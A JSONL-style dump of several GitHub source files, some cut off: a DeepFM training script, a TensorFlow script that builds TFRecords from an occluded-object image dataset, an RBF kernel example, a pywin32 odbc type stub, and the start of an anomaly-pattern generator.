0.02,\n \"dropout\": 0.35,\n \"embedding_dim\": 8,\n \"layer_size1\": 32,\n \"layer_size2\": 8,\n \"batch_size\": 1000,\n \"l2_reg_embedding\": 0.0001,\n \"l2_reg_dnn\": 0.00001,\n \"tau\": 0.02\n }\n return params\n\n\nif __name__ == '__main__':\n # 一些默认参数\n params = \\\n {\n \"current_time\": current_time,\n \"project_name\": \"CiteULike_SAUC\",\n \"datadir\": \"../Datasets/CiteULike/\",\n \"dataset\": 'CiteULike',\n \"seed\": 0,\n \"cuda\": 2,\n \"tau\": 0.1,\n # train\n \"lr\": 0.005,\n \"dropout\": 0.9,\n \"batch_size\": 2000,\n \"epochs\": 3000,\n # save\n \"model_path\": \"../saved_models/xxx.pt\",\n # test\n \"only_test\": True\n }\n\n device = \"cpu\"\n use_cuda = True\n if use_cuda and torch.cuda.is_available():\n print(\"cuda ready...\")\n device = \"cuda:\" + str(params[\"cuda\"])\n\n logger = logging.getLogger(params[\"project_name\"])\n try:\n # get parameters form tuner\n tuner_params = nni.get_next_parameter()\n params.update(get_default_parameters())\n params.update(tuner_params)\n log_file_name = params[\"project_name\"] + \"_\" + current_time + \".log\"\n logger = logCof(logger, \"../log/\", log_file_name)\n logger.info(params)\n main(params)\n except Exception as exception:\n logger.exception(exception)\n raise\n","repo_name":"hannanhtang/sauc","sub_path":"run_with_CiteULike/DeepFM_SAUC.py","file_name":"DeepFM_SAUC.py","file_ext":"py","file_size_in_byte":6134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9171855273","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom datetime import datetime\nimport os\nimport random\nimport sys\nimport threading\nimport errno\n\n\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\n\n\n# custom functions\n# -----\n\n\nOSYCB_ENCODING = np.array(['NULL_CLASS', '072-a_toy_airplane', '065-g_cups',\n '063-b_marbles', '027_skillet', '036_wood_block',\n '013_apple', '073-e_lego_duplo',\n '028_skillet_lid', '017_orange',\n '070-b_colored_wood_blocks', '015_peach',\n '048_hammer', '063-a_marbles', '073-b_lego_duplo',\n '035_power_drill', '054_softball',\n '012_strawberry', '065-b_cups',\n '072-c_toy_airplane', '062_dice',\n '040_large_marker', '044_flat_screwdriver',\n '037_scissors', '011_banana', '009_gelatin_box',\n '014_lemon', '016_pear', '022_windex_bottle',\n '065-c_cups', '072-d_toy_airplane',\n '073-a_lego_duplo', '065-e_cups',\n '003_cracker_box', '065-f_cups',\n '070-a_colored_wood_blocks', '073-g_lego_duplo',\n '033_spatula', '043_phillips_screwdriver',\n '055_baseball', '073-d_lego_duplo', '029_plate',\n '052_extra_large_clamp', '021_bleach_cleanser',\n '065-a_cups', '019_pitcher_base', '018_plum',\n '065-h_cups', '065-j_cups', '065-d_cups',\n '025_mug', '032_knife', '065-i_cups',\n '026_sponge', '071_nine_hole_peg_test',\n '004_sugar_box', '056_tennis_ball',\n '038_padlock', '053_mini_soccer_ball',\n '059_chain', '061_foam_brick', '058_golf_ball',\n '006_mustard_bottle', '073-f_lego_duplo',\n '031_spoon', '051_large_clamp',\n '072-b_toy_airplane', '050_medium_clamp',\n '072-e_toy_airplane', '042_adjustable_wrench',\n '010_potted_meat_can', '024_bowl',\n '073-c_lego_duplo', '007_tuna_fish_can',\n '008_pudding_box', '057_racquetball',\n '030_fork', '002_master_chef_can',\n '077_rubiks_cube', '005_tomato_soup_can'])\n\ntf.app.flags.DEFINE_string('train_directory', './',\n 'Training data directory')\ntf.app.flags.DEFINE_string('validation_directory', './',\n 'Validation data directory')\n\n\ntf.app.flags.DEFINE_string('input_directory',\n '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/',\n 'where the image data is actually stored')\ntf.app.flags.DEFINE_string('pdstruct_file', '/home/aecgroup/aecdata/Textures/occluded/datasets/osycb/dataframes/OSYCB_2occ_allperc_combined.gzip',\n 'Pandas Dataframe Pickle file')\n\n# directories for the differentiable data\n# '/home/aecgroup/aecdata/Textures/occluded/datasets/osycb/dataframes/OSYCB_2occ_allperc_combined.gzip''\n\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/20p/YCBdb2_2occ_20p_usample1000_downsampled4.gzip'\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/40p/YCBdb2_2occ_40p_usample1000_downsampled4.gzip'\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/60p/YCBdb2_2occ_60p_usample1000_downsampled4.gzip'\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/80p/YCBdb2_2occ_80p_usample1000_downsampled4.gzip'\n\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/20p/YCBdb2_2occ_20p_usample1000.gzip'\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/40p/YCBdb2_2occ_40p_usample1000.gzip'\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/60p/YCBdb2_2occ_60p_usample1000.gzip'\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/80p/YCBdb2_2occ_80p_usample1000.gzip'\n\n\ntf.app.flags.DEFINE_string('output_directory',\n '/home/aecgroup/aecdata/Textures/occluded/datasets/osycb/',\n 'where the tfrecord files will be stored')\n\n\n\n\ntf.app.flags.DEFINE_string(\n 'name_modifier', 'ds4', 'string that gets attached to the filename of the tfrecord-files for better discrimination')\n\n\ntf.app.flags.DEFINE_integer('train_shards', 10,\n 'Number of shards in training TFRecord files.')\ntf.app.flags.DEFINE_integer('validation_shards', 0,\n 'Number of shards in validation TFRecord files.')\n\ntf.app.flags.DEFINE_integer('num_threads', 10,\n 'Number of threads to preprocess the images.')\n\ntf.app.flags.DEFINE_integer('object_distance', 50,\n 'Distance from the camera to the object shown in the image')\n\ntf.app.flags.DEFINE_boolean('export', False,\n 'export to jpeg files')\ntf.app.flags.DEFINE_boolean('central_crop', False,\n 'central crop of the image')\ntf.app.flags.DEFINE_boolean('random_crop', False,\n'random crop of central crop of the image, target visible')\n\nFLAGS = tf.app.flags.FLAGS\n\n\ndef _int64_feature(value):\n \"\"\"Wrapper for inserting int64 features into Example proto.\"\"\"\n if not isinstance(value, list):\n value = [value]\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\ndef _bytes_feature(value):\n \"\"\"Wrapper for inserting bytes features into Example proto.\"\"\"\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n# TODO modify input of function to include other class-lists, maybe duplicate\n\ndef mkdir_p(path):\n \"\"\"\n mkdir_p takes a string path and creates a directory at this path if it\n does not already exist.\n \"\"\"\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\ndef _write_to_file(img_enc_left, img_enc_right, label, count):\n mkdir_p(FLAGS.output_directory + \"/export/left/label_{}/\".format(label))\n mkdir_p(FLAGS.output_directory + \"/export/right/label_{}/\".format(label))\n\n f = open(FLAGS.output_directory + \"/export/left/label_{}/{}.jpeg\".format(label, count), \"wb+\")\n f.write(img_enc_left)\n f.close()\n f = open(FLAGS.output_directory + \"/export/right/label_{}/{}.jpeg\".format(label, count), \"wb+\")\n f.write(img_enc_right)\n f.close()\n\ndef _convert_to_example(filename_l, image_buffer_l, filename_r, image_buffer_r, label, text, occ1_text, occ2_text, occ3_text, occ1_label, occ2_label, occ3_label, height, width):\n \"\"\"Build an Example proto for an example.\n\n Args:\n filename: string, path to an image file, e.g., '/path/to/example.JPG'\n image_buffer: string, JPEG encoding of RGB image\n label: integer, identifier for the ground truth for the network\n text: string, unique human-readable, e.g. 'dog'\n height: integer, image height in pixels\n width: integer, image width in pixels\n Returns:\n Example proto\n \"\"\"\n\n colorspace = 'RGB'\n channels = 3\n image_format = 'JPEG'\n\n example = tf.train.Example(features=tf.train.Features(feature={\n 'image/height': _int64_feature(height),\n 'image/width': _int64_feature(width),\n 'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),\n 'image/channels': _int64_feature(channels),\n 'image/class/label': _int64_feature(label),\n 'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),\n\n 'image/class/occ1_label': _int64_feature(occ1_label),\n 'image/class/occ1_text': _bytes_feature(tf.compat.as_bytes(occ1_text)),\n 'image/class/occ2_label': _int64_feature(occ2_label),\n 'image/class/occ2_text': _bytes_feature(tf.compat.as_bytes(occ2_text)),\n 'image/class/occ3_label': _int64_feature(occ3_label),\n 'image/class/occ3_text': _bytes_feature(tf.compat.as_bytes(occ3_text)),\n # TODO: Add different classes that are only present in the pd datastruct\n # such as occlusion, eye_occlusion, eye_position etc.\n 'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),\n 'image/left/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename_l))),\n 'image/left/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer_l)),\n 'image/right/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename_r))),\n 'image/right/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer_r))}))\n return example\n\n\n#TODO replace the _convert_example function with this:\ndef make_tf_example(image_string_left, image_string_right, labels,\n occlusion_percentage_left, occlusion_percentage_right,\n segmentation_string_left, segmentation_string_right):\n \"\"\" Make tf-examples from image strings and labels\"\"\"\n feature_dict = \\\n {'image_left': tf.train.Feature(\n bytes_list=tf.train.BytesList(value=[image_string_left])),\n 'image_right': tf.train.Feature(\n bytes_list=tf.train.BytesList(value=[image_string_right])),\n 'occlusion_left': tf.train.Feature(\n float_list=tf.train.FloatList(value=[occlusion_percentage_left])),\n 'occlusion_right': tf.train.Feature(\n float_list=tf.train.FloatList(value=[occlusion_percentage_right])),\n 'occlusion_avg': tf.train.Feature(\n float_list=tf.train.FloatList(value=[\n (occlusion_percentage_left + occlusion_percentage_right)/2])),\n 'segmap_left': tf.train.Feature(\n bytes_list=tf.train.BytesList(value=[segmentation_string_left])),\n 'segmap_right': tf.train.Feature(\n bytes_list=tf.train.BytesList(value=[segmentation_string_right]))\n }\n\n for i in range(len(labels)):\n feature_dict['label{}'.format(i+1)] = \\\n tf.train.Feature(int64_list=tf.train.Int64List(value=[labels[i]]))\n\n return tf.train.Example(features=tf.train.Features(feature=feature_dict))\n\nclass ImageCoder(object):\n \"\"\"Helper class that provides TensorFlow image coding utilities.\"\"\"\n\n def __init__(self):\n # Create a single Session to run all image coding calls.\n self._sess = tf.Session()\n\n # Initializes function that converts PNG to JPEG data.\n self._png_data = tf.placeholder(dtype=tf.string)\n image = tf.image.decode_png(self._png_data, channels=3)\n self._png_to_jpeg = tf.image.encode_jpeg(\n image, format='rgb', quality=100)\n\n # Initializes function that decodes RGB JPEG data.\n self._decode_jpeg_data = tf.placeholder(dtype=tf.string)\n self._decode_jpeg = tf.image.decode_jpeg(\n self._decode_jpeg_data, channels=3)\n\n # Initializes function that converts rgb to grayscale\n self._jpeg_data = tf.placeholder(dtype=tf.string)\n image_j = tf.image.rgb_to_grayscale(\n tf.image.decode_jpeg(self._jpeg_data, channels=3))\n self._rgb_to_grayscale = tf.image.encode_jpeg(\n image_j, format='grayscale', quality=100)\n\n\n self._crop_data = tf.placeholder(dtype=tf.string)\n image_decoded = tf.image.decode_jpeg(self._crop_data, channels=3)\n self.cropped = tf.image.encode_jpeg(tf.image.resize_with_crop_or_pad(\n image_decoded,\n 32, 32), format='rgb', quality=100)\n \n \n self.random_cropped = tf.image.encode_jpeg(tf.image.random_crop(\n tf.image.resize_with_crop_or_pad(\n image_decoded,\n 56, 56)\n , size = [32, 32, 3]), format='rgb', quality=100)\n\n self._encode_jpeg_data = tf.placeholder(dtype=tf.uint8)\n self._encode_jpeg = tf.image.encode_jpeg(\n self._encode_jpeg_data, format='rgb', quality=100)\n\n self._encode_png_data = tf.placeholder(dtype=tf.uint8)\n self._encode_png = tf.image.encode_png(\n self._encode_png_data)\n\n def central_crop(self, image_data, target_height, target_width):\n image = self._sess.run(self.cropped,\n feed_dict={self._crop_data: image_data})\n return image\n \n def random_crop(self, image_data, target_height, target_width):\n \"TODO: Make this work properly\"\n image = self._sess.run(self.random_cropped,\n feed_dict={self._crop_data: image_data})\n return image\n\n def encode_jpeg(self, array):\n # Initializes function that converts rgb to grayscale\n image = self._sess.run(self._encode_jpeg,\n feed_dict={self._encode_jpeg_data: array})\n\n return image\n\n def encode_png(self, array):\n # Initializes function that converts rgb to grayscale\n image = self._sess.run(self._encode_png,\n feed_dict={self._encode_png_data: array})\n\n return image\n\n def png_to_jpeg(self, image_data):\n return self._sess.run(self._png_to_jpeg,\n feed_dict={self._png_data: image_data})\n\n def decode_jpeg(self, image_data):\n image = self._sess.run(self._decode_jpeg,\n feed_dict={self._decode_jpeg_data: image_data})\n assert len(image.shape) == 3\n assert image.shape[2] == 3\n return image\n\n def rgb_to_grayscale(self, imagedata):\n imagedata = self._sess.run(self._rgb_to_grayscale,\n feed_dict={self._jpeg_data: image_data})\n return imagedata\n\n\ndef _is_png(filename):\n \"\"\"Determine if a file contains a PNG format image.\n\n Args:\n filename: string, path of the image file.\n\n Returns:\n boolean indicating if the image is a PNG.\n \"\"\"\n return '.png' in filename\n\n\ndef _process_image(filename, coder):\n \"\"\"Process a single image file.\n\n Args:\n filename: string, path to an image file e.g., '/path/to/example.JPG'.\n coder: instance of ImageCoder to provide TensorFlow image coding utils.\n Returns:\n image_buffer: string, JPEG encoding of RGB image.\n height: integer, image height in pixels.\n width: integer, image width in pixels.\n \"\"\"\n # Read the image file.\n with tf.gfile.FastGFile(filename, 'rb') as f:\n image_data = f.read()\n\n # Convert any PNG to JPEG's for consistency.\n if _is_png(filename):\n print('Converting PNG to JPEG for %s' % filename)\n image_data = coder.png_to_jpeg(image_data)\n\n # Decode the RGB JPEG.\n image = coder.decode_jpeg(image_data)\n\n # Check that image converted to RGB\n assert len(image.shape) == 3\n height = image.shape[0]\n width = image.shape[1]\n assert image.shape[2] == 3\n\n if FLAGS.central_crop:\n image_data = coder.central_crop(image_data, width//10*4, width//10*4)\n if FLAGS.random_crop:\n image_data = coder.random_crop(image_data, width//10*4, width//10*4)\n return image_data, height, width\n\n# TODO: this needs to have additional inputs, too.\n\n\ndef _process_segmentation_map(filename_l, height, width, coder):\n from PIL import Image\n import numpy as np\n from scipy.misc import imresize\n import matplotlib.pyplot as plt\n\n segmentation_file = filename_l.rsplit('_left', 1)[0]+'.npz'\n segmaps = np.load(segmentation_file)\n\n segmap_l = segmaps['segmentation_left']\n segmap_r = segmaps['segmentation_right']\n\n segmap_l = imresize(segmap_l, size=(height, width))\n segmap_r = imresize(segmap_r, size=(height, width))\n bin_segmap_l = np.array(segmap_l > 0, dtype=int)\n bin_segmap_r = np.array(segmap_r > 0, dtype=int)\n\n\n # construct binary maps\n bin_segmap_l[:, :, 0] = bin_segmap_l[:, :, 0] - \\\n bin_segmap_l[:, :, 1] - bin_segmap_l[:, :, 2]\n bin_segmap_l[:, :, 1] = bin_segmap_l[:, :, 1] - bin_segmap_l[:, :, 2]\n\n bin_segmap_r[:, :, 0] = bin_segmap_r[:, :, 0] - \\\n bin_segmap_r[:, :, 1] - bin_segmap_r[:, :, 2]\n bin_segmap_r[:, :, 1] = bin_segmap_r[:, :, 1] - bin_segmap_r[:, :, 2]\n\n segmap_l = np.multiply(bin_segmap_l, np.array(segmap_l > 0, dtype=int)*255)\n segmap_r = np.multiply(bin_segmap_r, np.array(segmap_r > 0, dtype=int)*255)\n\n jpeg_left = coder.encode_jpeg(segmap_l)\n jpeg_right = coder.encode_jpeg(segmap_r)\n #\n # jpeg_left = coder.encode_png(segmap_l)\n # jpeg_right = coder.encode_png(segmap_r)\n\n if FLAGS.central_crop:\n segmap_l = coder.central_crop(jpeg_left, width//10*4, width//10*4)\n segmap_r = coder.central_crop(jpeg_right, width//10*4, width//10*4)\n return segmap_l, segmap_r, height/10*4, width/10*4\n if FLAGS.random_crop:\n segmap_l = coder.random_crop(jpeg_left, width//10*4, width//10*4)\n segmap_r = coder.random_crop(jpeg_right, width//10*4, width//10*4)\n return segmap_l, segmap_r, height/10*4, width/10*4\n else:\n return segmap_l, segmap_r, height, width\n\n\ndef _process_image_files_batch(coder, thread_index, ranges, name, filenames,\n texts, labels, occ_texts, occ_labels, occ_percs, num_shards):\n \"\"\"Processes and saves list of images as TFRecord in 1 thread.\n\n Args:\n coder: instance of ImageCoder to provide TensorFlow image coding utils.\n thread_index: integer, unique batch to run index is within [0, len(ranges)).\n ranges: list of pairs of integers specifying ranges of each batches to\n analyze in parallel.\n name: string, unique identifier specifying the data set\n filenames: list of strings; each string is a path to an image file\n texts: list of strings; each string is human readable, e.g. 'dog'\n labels: list of integer; each integer identifies the ground truth\n num_shards: integer number of shards for this data set.\n \"\"\"\n # Each thread produces N shards where N = int(num_shards / num_threads).\n # For instance, if num_shards = 128, and the num_threads = 2, then the first\n # thread would produce shards [0, 64).\n num_threads = len(ranges)\n assert not num_shards % num_threads\n num_shards_per_batch = int(num_shards / num_threads)\n\n shard_ranges = np.linspace(ranges[thread_index][0],\n ranges[thread_index][1],\n num_shards_per_batch + 1).astype(int)\n num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]\n\n counter = 0\n for s in range(num_shards_per_batch):\n # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'\n shard = thread_index * num_shards_per_batch + s\n output_filename = '%s-%.5d-of-%.5d.tfrecord' % (\n name, shard, num_shards)\n output_file = os.path.join(FLAGS.output_directory, output_filename)\n writer = tf.python_io.TFRecordWriter(output_file)\n\n shard_counter = 0\n files_in_shard = np.arange(\n shard_ranges[s], shard_ranges[s + 1], dtype=int)\n for i in files_in_shard:\n filename_l = filenames[0][i]\n filename_r = filenames[1][i]\n label = labels[i]\n text = texts[i]\n occ1_text = occ_texts[0][i]\n occ2_text = occ_texts[1][i]\n occ3_text = occ_texts[2][i]\n occ1_label = occ_labels[0][i]\n occ2_label = occ_labels[1][i]\n occ3_label = occ_labels[2][i]\n occ_left = occ_percs[0][i]\n occ_right = occ_percs[1][i]\n occ_avg = occ_percs[2][i]\n\n image_buffer_l, height, width = _process_image(filename_l, coder)\n image_buffer_r, _, _ = _process_image(filename_r, coder)\n\n if FLAGS.export:\n _write_to_file(image_buffer_l, image_buffer_r, label, counter)\n else:\n # process segmentation_maps\n seg_buffer_l, seg_buffer_r, height, width = _process_segmentation_map(filename_l, height, width, coder)\n\n #example = _convert_to_example(filename_l, image_buffer_l, filename_r, image_buffer_r, label,\n # text, occ1_text, occ2_text, occ3_text, occ1_label, occ2_label, occ3_label, height, width)\n example = make_tf_example(image_buffer_l, image_buffer_r, (label, occ1_label, occ2_label, occ3_label), occ_left, occ_right, seg_buffer_l, seg_buffer_r)\n writer.write(example.SerializeToString())\n shard_counter += 1\n counter += 1\n\n if not counter % 1000:\n print('%s [thread %d]: Processed %d of %d images in thread batch.' %\n (datetime.now(), thread_index, counter, num_files_in_thread))\n sys.stdout.flush()\n\n writer.close()\n print('%s [thread %d]: Wrote %d images to %s' %\n (datetime.now(), thread_index, shard_counter, output_file))\n sys.stdout.flush()\n shard_counter = 0\n print('%s [thread %d]: Wrote %d images to %d shards.' %\n (datetime.now(), thread_index, counter, num_files_in_thread))\n sys.stdout.flush()\n\n\ndef _process_image_files(name, filenames, texts, labels, occ_texts, occ_labels, occ_percs, num_shards):\n \"\"\"Process and save list of images as TFRecord of Example protos.\n\n Args:\n name: string, unique identifier specifying the data set\n filenames: list of strings; each string is a path to an image file\n texts: list of strings; each string is human readable, e.g. 'dog'\n labels: list of integer; each integer identifies the ground truth\n num_shards: integer number of shards for this data set.\n \"\"\"\n assert len(filenames[0]) == len(texts)\n assert len(filenames[0]) == len(labels)\n\n # Break all images into batches with a [ranges[i][0], ranges[i][1]].\n spacing = np.linspace(\n 0, len(filenames[0]), FLAGS.num_threads + 1).astype(np.int)\n ranges = []\n for i in range(len(spacing) - 1):\n ranges.append([spacing[i], spacing[i + 1]])\n\n # Launch a thread for each batch.\n print('Launching %d threads for spacings: %s' %\n (FLAGS.num_threads, ranges))\n sys.stdout.flush()\n\n # Create a mechanism for monitoring when all threads are finished.\n coord = tf.train.Coordinator()\n\n # Create a generic TensorFlow-based utility for converting all image codings.\n coder = ImageCoder()\n\n threads = []\n for thread_index in range(len(ranges)):\n args = (coder, thread_index, ranges, name, filenames,\n texts, labels, occ_texts, occ_labels, occ_percs, num_shards)\n t = threading.Thread(target=_process_image_files_batch, args=args)\n t.start()\n threads.append(t)\n\n # Wait for all the threads to terminate.\n coord.join(threads)\n print('%s: Finished writing all %d images in data set.' %\n (datetime.now(), len(filenames[0])))\n sys.stdout.flush()\n\ndef _find_image_files_in_struct(pdDataFrameDir, distance):\n # get the information instead from the datastruct\n pdDataFrame = pd.read_pickle(pdDataFrameDir)\n\n # make selection of what you actually want to extract -> fine pictures\n pdDataFrame_l = pdDataFrame[pdDataFrame.scale ==\n 'fine'][pdDataFrame.eye == 'left']\n pdDataFrame_r = pdDataFrame[pdDataFrame.scale ==\n 'fine'][pdDataFrame.eye == 'right']\n\n filenames_l = pdDataFrame_l.filepath.values.tolist()\n filenames_r = pdDataFrame_r.filepath.values.tolist()\n texts = pdDataFrame_l.object_in_focus.values\n occ1_texts = pdDataFrame_l.first_occluder.values\n occ2_texts = pdDataFrame_l.second_occluder.values\n occ3_texts = pdDataFrame_l.third_occluder.values\n\n occs_avg = pdDataFrame_l.occlusion.values\n occs_left = pdDataFrame_l.occlusion_left.values\n occs_right = pdDataFrame_l.occlusion_right.values\n\n # # labels of focussed object\n # unique_labels = pdDataFrame_l.object_in_focus.unique().tolist()\n # labels = []\n # # Leave label index 0 empty as a background class.\n # label_index = 1\n # for text in unique_labels:\n # labels.extend([label_index] * texts[texts == text].shape[0])\n # label_index += 1\n #\n # insert any sorting you want (important for comparison)\n unique_labels = OSYCB_ENCODING[1:] # OSYCB_ENCODING[0] is NULLCLASS\n labels = np.zeros_like(texts)\n occ1_labels = np.zeros_like(occ1_texts)\n occ2_labels = np.zeros_like(occ2_texts)\n occ3_labels = np.zeros_like(occ3_texts)\n # Leave label index 0 empty as a background class.\n label_index = 1\n for text in unique_labels:\n labels[np.where(texts == 'G' + text)[0]] = label_index\n\n occ1_labels[np.where(occ1_texts == 'G' + text)[0]] = label_index\n occ2_labels[np.where(occ2_texts == 'G' + text)[0]] = label_index\n occ3_labels[np.where(occ3_texts == 'G' + text)[0]] = label_index\n label_index += 1\n\n # remap the texts arrays to a list\n texts = texts.tolist()\n occ1_texts = occ1_texts.tolist()\n occ2_texts = occ2_texts.tolist()\n occ3_texts = occ3_texts.tolist()\n\n labels = labels.tolist()\n occ1_labels = occ1_labels.tolist()\n occ2_labels = occ2_labels.tolist()\n occ3_labels = occ3_labels.tolist()\n\n occs_avg = occs_avg.tolist()\n occs_left = occs_left.tolist()\n occs_right = occs_right.tolist()\n\n # Shuffle the ordering of all image files in order to guarantee\n # random ordering of the images with respect to label in the\n # saved TFRecord files. Make the randomization repeatable.\n shuffled_index = list(range(len(filenames_l)))\n random.seed(12345)\n random.shuffle(shuffled_index)\n\n filenames_l = [filenames_l[i] for i in shuffled_index]\n filenames_r = [filenames_r[i] for i in shuffled_index]\n\n occ1_texts = [occ1_texts[i] for i in shuffled_index]\n occ2_texts = [occ2_texts[i] for i in shuffled_index]\n occ3_texts = [occ3_texts[i] for i in shuffled_index]\n texts = [texts[i] for i in shuffled_index]\n\n occ1_labels = [occ1_labels[i] for i in shuffled_index]\n occ2_labels = [occ2_labels[i] for i in shuffled_index]\n occ3_labels = [occ3_labels[i] for i in shuffled_index]\n labels = [labels[i] for i in shuffled_index]\n\n occs_avg = [occs_avg[i] for i in shuffled_index]\n occs_left = [occs_left[i] for i in shuffled_index]\n occs_right = [occs_right[i] for i in shuffled_index]\n\n print('Found %d JPEG files across %d labels.' %\n (len(filenames_l), len(unique_labels)))\n\n # workaround to cleanup filenames\n filenames_l = [FLAGS.input_directory + filename.split('/', 7)[-1] for filename in filenames_l]\n filenames_r = [FLAGS.input_directory + filename.split('/', 7)[-1] for filename in filenames_r]\n\n # store some variables in tuples\n occ_texts = (occ1_texts, occ2_texts, occ3_texts)\n occ_labels = (occ1_labels, occ2_labels, occ3_labels)\n filenames = (filenames_l, filenames_r)\n occ_percs = (occs_left, occs_right, occs_avg)\n return filenames, texts, labels, occ_texts, occ_labels, occ_percs\n\n\ndef _process_dataset_from_struct(name, pdDataFrameDir, num_shards):\n \"\"\"Process a complete data set and save it as a TFRecord.\n\n Args:\n name: string, unique identifier specifying the data set.\n pdDataFrameDir: string, path of the pandas DataFrame struct generated by the YCB_database generator\n num_shards: integer number of shards for this data set.\n \"\"\"\n object_distance = float(FLAGS.object_distance)\n filenames, texts, labels, occ_texts, occ_labels, occ_percs = _find_image_files_in_struct(\n pdDataFrameDir, object_distance)\n _process_image_files(name + str(FLAGS.object_distance) + FLAGS.name_modifier,\n filenames, texts, labels, occ_texts, occ_labels, occ_percs, num_shards)\n\n\ndef main(unused_argv):\n assert not FLAGS.train_shards % FLAGS.num_threads, (\n 'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')\n assert not FLAGS.validation_shards % FLAGS.num_threads, (\n 'Please make the FLAGS.num_threads commensurate with '\n 'FLAGS.validation_shards')\n print('Saving results to %s' % FLAGS.output_directory)\n\n # Run it!\n _process_dataset_from_struct('validation', FLAGS.pdstruct_file,\n FLAGS.validation_shards)\n _process_dataset_from_struct('train', FLAGS.pdstruct_file,\n FLAGS.train_shards)\n\n\nif __name__ == '__main__':\n tf.app.run()\n\n","repo_name":"mrernst/CAR_flow","sub_path":"datasets/osycb/osycb_to_tfrecord.py","file_name":"osycb_to_tfrecord.py","file_ext":"py","file_size_in_byte":28973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"30245643379","text":"import torch\nimport torch.nn as nn\nfrom ika import IKA, distance_matrix\n\n\nclass RBFModel(nn.Module):\n def __init__(self, filters, sigma):\n super().__init__()\n\n self.filters = nn.Parameter(filters)\n self.sigma = sigma\n\n def forward(self, x):\n return torch.exp(-distance_matrix(x, self.filters, squared=True) / (2 * self.sigma ** 2))\n\n\ndef main():\n X = torch.randn((1000, 32))\n\n D = distance_matrix(X, X)\n\n sigma, _ = torch.kthvalue(D.view(-1), int(0.1 * D.size(0) ** 2), dim=-1)\n sigma = sigma.item()\n\n filters = torch.randn((64, 32))\n b = RBFModel(filters, sigma)\n\n ika = IKA(b)\n\n G = torch.exp(-0.5 * (D / sigma) ** 2)\n ika.compute_linear_layer(X, G)\n\n with torch.no_grad():\n y = ika(X)\n G_ = y @ y.t()\n\n # error = torch.norm(G - G_) / torch.norm(G)\n # print(error.item())\n loss = torch.mean((G - G_) ** 2)\n print(loss.item())\n\n optimizer = torch.optim.Adam(b.parameters(), lr=1e-2)\n\n for i in range(50):\n X = torch.randn((3000, 32))\n G = torch.exp(-0.5 * (distance_matrix(X, X) / sigma) ** 2)\n\n y = ika(X)\n G_ = y @ y.t()\n\n loss = torch.mean((G - G_) ** 2)\n print(loss.item())\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n ika.compute_linear_layer(X, G)\n\n\nmain()\n","repo_name":"matteo-ronchetti/IKA","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"17896135905","text":"from _typeshed import Incomplete\nfrom typing_extensions import Literal, TypeAlias\n\nimport _win32typing\n\ndef odbc(connectionString: str) -> _win32typing.connection: ...\ndef SQLDataSources(direction) -> tuple[Incomplete, Incomplete]: ...\n\n_odbcError: TypeAlias = type # noqa: Y042 # Does not exist at runtime, but odbc.odbcError is a valid type.\nDATE: str\nNUMBER: str\nRAW: str\nSQL_FETCH_ABSOLUTE: int\nSQL_FETCH_FIRST: int\nSQL_FETCH_FIRST_SYSTEM: int\nSQL_FETCH_FIRST_USER: int\nSQL_FETCH_LAST: int\nSQL_FETCH_NEXT: int\nSQL_FETCH_PRIOR: int\nSQL_FETCH_RELATIVE: int\nSTRING: str\nTYPES: tuple[Literal[\"STRING\"], Literal[\"RAW\"], Literal[\"NUMBER\"], Literal[\"DATE\"]]\ndataError: Incomplete\nerror: _odbcError\nintegrityError: Incomplete\ninternalError: Incomplete\nnoError: Incomplete\nopError: Incomplete\nprogError: Incomplete\n","repo_name":"JetBrains/intellij-community","sub_path":"python/helpers/typeshed/stubs/pywin32/win32/odbc.pyi","file_name":"odbc.pyi","file_ext":"pyi","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":16005,"dataset":"github-code","pt":"66"} +{"seq_id":"6018543119","text":"from dataclasses import dataclass\nfrom typing import Type\nfrom sklearn.preprocessing import MinMaxScaler\n\nimport numpy as np\n\nfrom . import BaseAnomaly\nfrom .. import AnomalyProtocol\nfrom ...utils.types import BaseOscillationKind\n\n\n@dataclass\nclass AnomalyPatternParameters:\n sinusoid_k: float = 10.0\n cbf_pattern_factor: float = 2.0\n\n\nclass AnomalyPattern(BaseAnomaly):\n def generate(self, anomaly_protocol: AnomalyProtocol) -> AnomalyProtocol:\n if anomaly_protocol.base_oscillation_kind == BaseOscillationKind.Sine:\n def sinusoid(t: np.ndarray, k: float, amplitude: float) -> np.ndarray:\n pattern = (np.arctan(k * t) / np.arctan(k))\n scaled = MinMaxScaler(feature_range=(-amplitude, 